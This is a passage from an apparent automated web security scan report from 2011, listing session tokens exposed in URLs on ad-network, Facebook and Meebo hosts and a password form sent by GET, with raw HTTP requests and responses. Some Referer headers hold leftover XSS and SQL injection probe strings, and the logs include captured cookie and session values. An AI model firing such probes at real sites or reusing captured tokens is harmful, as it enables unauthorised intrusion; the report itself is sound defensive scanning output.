Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=1128450710

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/4/4/3/
Content-Length: 0
Content-Type: text/html

9.9. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=1348442932 HTTP/1.1
Host: nai.adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=1348442932; criteoastro=1; JEB2=4E4934866E651A2318BD90FFF00050FA

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/5/4/3/
Content-Length: 0
Content-Type: text/html

9.10. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=1581270199 HTTP/1.1
Host: nai.adserverec.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=1581270199

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:25:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/6/4/3/
Content-Length: 0
Content-Type: text/html

9.11. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=52531776 HTTP/1.1
Host: nai.adserverwc.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=52531776

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:25:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/7/4/3/
Content-Length: 0
Content-Type: text/html

9.12. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=819977518 HTTP/1.1
Host: nai.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=819977518

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:24:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/1/4/3/
Content-Length: 0
Content-Type: text/html

9.13. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=8239370 HTTP/1.1
Host: nai.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=8239370

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/3/4/3/
Content-Length: 0
Content-Type: text/html

9.14. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=1812733584 HTTP/1.1
Host: nai.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=1812733584; ACID=tX790013123977920032; C2=1yMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; GUID=MTMxNjI3NzQyOTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/0/4/3/
Content-Length: 0
Content-Type: text/html

9.15. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=585997419 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=585997419

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:25:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/8/4/3/
Content-Length: 0
Content-Type: text/html

9.16. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=1032347115 HTTP/1.1
Host: nai.tacoda.at.atwola.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: OO_TOKEN=1032347115; ATTACID=a3Z0aWQ9MTcyam1raDE3ZzEwcnM=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; JEB2=4E45A26F6E651A2318BD90FFF001EBF9; ANRTT=; Tsid=0^1316277340^1316279228|15545^1316277340^1316279140|18182^1316277428^1316279228; eadx=x

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/2/4/3/
Content-Length: 0
Content-Type: text/html

9.17. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ra1_uid=4639578929876828096; ra1_sid=22; BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Sun, 16-Sep-2012 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
9.18. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=188431397834075&app_id=188431397834075&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13c607dfc%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd228a70%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3114dd90c%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df239d9d35%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff494c534%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.114.33
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:43 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f239d9d35&origin=http\u00253A\u00252F\u00252Fwww.local.com\u00252Ff46d0d5f8&relation=parent&transport=postmessage&frame=f272fcebe4", "http:\/\/ww
...[SNIP]...
9.19. http://www.meebo.com/mcmd/events  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.meebo.com
Path:   /mcmd/events

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mcmd/events?sessionKey=000000000000000000000000aa9dff0ac8a3ChmUyC1w6d48f02b3997f5f7f9ae1363b461&rev=1&clientId=0 HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Cache-Control: max-age=0
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; meebo-cim-session=26e5cf38356ae41d2e8d; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26ac15%3D1%26ic8%3D1%26ac7%3D1%26ac6%3D1%26ac4%3D1%26ic20%3D1%26ic7%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:25:44 GMT
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Content-Length: 21

{"rev":2,"events":[]}
9.20. http://www.meebo.com/mcmd/subscribe  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.meebo.com
Path:   /mcmd/subscribe

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mcmd/subscribe?sessionKey=000000000000000000000000aa9dff0ac8a3ChmUyC1w6d48f02b3997f5f7f9ae1363b461&type=stream&url=stream%3A%2F%2Fseventeen%2Ffex20huj&clientId=0 HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Cache-Control: max-age=0
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; meebo-cim-session=26e5cf38356ae41d2e8d; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26ac15%3D1%26ic8%3D1%26ac7%3D1%26ac6%3D1%26ac4%3D1%26ic20%3D1%26ic7%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:36:35 GMT
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Content-Length: 57

{"stat":"fail","msg":"Invalid sessionKey","errorcode":11}
9.21. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:14:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<td valign=top><img src='http://info.yahoo.com/nai/optout.html?token=VjRBR0ZmS3AyMFQ-' width=15 height=15></td>
...[SNIP]...
9.22. http://www.networkadvertising.org/yahoo_handler  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /yahoo_handler

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /yahoo_handler?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=IEJKFAKCLNPGOALBBGOPFGNN; __utma=1.1392774634.1315133979.1315416406.1316295035.3; __utmb=1; __utmc=1; __utmz=1.1316295035.3.3.utmccn=(referral)|utmcsr=networkadvertising.org|utmcct=/consumer/opt_out.asp|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:45:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
9.23. http://www.realage.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.realage.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=480
Date: Sat, 17 Sep 2011 16:30:15 GMT
Content-Length: 106452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   
   
       <meta http-equiv="
...[SNIP]...
</a>
                                                               
                                                           
                                                               <a class="m1 dd_bor_top" href="http://healthlibrary.epnet.com/GetContent.aspx?token=1edc3d6e-4fec-4b20-baca-795e48830daa">Medical Encyclopedia</a>
...[SNIP]...
10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET / HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=68
Date: Sat, 17 Sep 2011 16:34:01 GMT
Content-Length: 103172
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
</div>
